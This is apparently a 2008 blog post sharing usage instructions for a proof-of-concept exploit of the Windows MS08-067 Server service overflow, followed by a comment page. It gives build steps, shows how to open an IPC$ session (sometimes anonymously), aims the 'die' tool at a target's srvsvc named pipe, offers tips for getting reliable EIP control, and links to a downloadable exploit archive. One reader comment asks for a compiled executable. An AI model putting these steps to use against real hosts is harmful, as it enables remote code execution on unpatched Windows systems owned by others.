In vstudio command prompt:

  mk.bat

next:

  attach debugger to services.exe (2k) or the relevant svchost (xp/2k3/...)

  net use \\IPADDRESS\IPC$ /user:user creds
  die \\IPADDRESS \pipe\srvsvc

  In some cases, /user:"" "", will suffice (i.e., anonymous connection)

You should get EIP -> 00 78 00 78, a stack overflow (like a guard page violation), access violation, etc.  However, in some cases, you will get nothing.

This is because it depends on the state of the stack prior to the "overflow". You need a slash on the stack prior to the input buffer.So play around a bit, you'll get it working reliably...

poc:
http://milw0rm.com/sploits/2008-ms08-067.zip

Download ( 925 downloads)
Bug&Exp | Comments(1) | Trackbacks(0) | Reads(10488)
pzy4141
October 24, 2008 22:17
能发布出EXE么?感激不尽啊
Pages: 1/1 First page 1 Final page
Add a comment
Emots
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
Enable HTML
Enable UBB
Enable Emots
Hidden
Nickname   Password   Optional
Site URI   Email   [Register]
               

Security code Case insensitive